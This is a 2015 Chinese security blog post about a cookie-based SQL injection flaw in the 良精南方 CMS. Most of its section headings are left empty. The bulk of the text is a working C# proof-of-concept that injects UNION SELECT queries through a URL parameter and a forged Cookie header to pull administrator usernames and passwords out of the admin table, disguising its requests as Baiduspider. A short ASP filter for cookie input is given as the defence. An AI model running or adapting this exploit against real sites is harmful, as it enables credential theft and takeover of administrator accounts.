良精南方cms /inc/Check_Sql.asp SQL Injection Based On Cookie

Andrew.Hann發表於2015-09-09

catalog

1. 漏洞描述
2. 漏洞觸發條件
3. 漏洞影響範圍
4. 漏洞程式碼分析
5. 防禦方法
6. 攻防思考

 

1. 漏洞描述

Relevant Link:
2. 漏洞觸發條件

0x1: POC

using System;
using System.Collections;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;
namespace windowsmanger
{
    internal class ljnanfang
    {
        public string exp(string url)
        {
            string result;
            try
            {
                string exps = "/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20%66%72%6F%6D%20%61%64%6D%69%6E";
                string urls = url;
                if (!urls.Contains("http://"))
                {
                    urls = "http://" + urls;
                }
                string shuju = new WebClient
                {
                    Headers = 
                    {

                        {
                            "user-agent",
                            "Baiduspider"
                        }
                    },
                    Encoding = Encoding.Default
                }.DownloadString(urls + exps).Replace("\r", "").Replace("\n", "");
                int a = shuju.IndexOf("title=");
                int b = shuju.IndexOf("target=");
                string jieguo = shuju.Substring(a + 8, b - a - 11);
                result = jieguo;
            }
            catch
            {
                string jieguosd = this.isshuju(url);
                if (jieguosd != "網站未發現安全隱患")
                {
                    result = jieguosd;
                }
                else
                {
                    result = "網站未發現安全隱患";
                }
            }
            return result;
        }
        public string isshuju(string url)
        {
            string result;
            try
            {
                string exps = "/shownews.asp";
                string shuju = new WebClient
                {
                    Proxy = null,
                    Encoding = Encoding.Default,
                    Headers = 
                    {

                        {
                            "user-agent",
                            "Baiduspider"
                        },

                        {
                            "Cookie",
                            "ASPSESSIONIDCACQBSAT=JGGFLMFDNIDGIFLOJHNBMGBK;id=59+union+select+1,username,password,4,5,6,7,8,9,10+from+admin"
                        }
                    }
                }.DownloadString(url + exps);
                MatchCollection matcha = new Regex("<td.height=.50..*?align=.center..class=..*?.>(?<admin>.*?)</td>\\r(?s).*?</font>次.*?>\\r.*?\\r.*?\\r.*?\\r(?<pass>.*?)</td>", RegexOptions.None).Matches(shuju);
                IEnumerator enumerator = matcha.GetEnumerator();
                try
                {
                    if (enumerator.MoveNext())
                    {
                        Match match = (Match)enumerator.Current;
                        string bb = match.Groups["admin"].ToString().Replace(" ", "");
                        string cc = match.Groups["pass"].ToString().Replace(" ", "");
                        result = bb + "  " + cc;
                        return result;
                    }
                }
                finally
                {
                    IDisposable disposable = enumerator as IDisposable;
                    if (disposable != null)
                    {
                        disposable.Dispose();
                    }
                }
                result = "網站未發現安全隱患";
            }
            catch
            {
                result = "網站未發現安全隱患";
            }
            return result;
        }
    }
}


3. 漏洞影響範圍
4. 漏洞程式碼分析

Cookie注入


5. 防禦方法

/inc/Check_Sql.asp

On Error Resume Next
''''
Chk_badword=split(Query_Badword,"")
For Each Fy_Get In Request.Cookies
    For i=0 To Ubound(Chk_badword)
        If Instr(LCase(Request.Cookies(Fy_Get)),Chk_badword(i))<>0 Then
        Response.End
        End If
    Next
Next
''''

官方最新的程式碼中包含有對POST、GET的過濾程式碼,需要在這個基礎上加上Cookie注入防禦


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

相關文章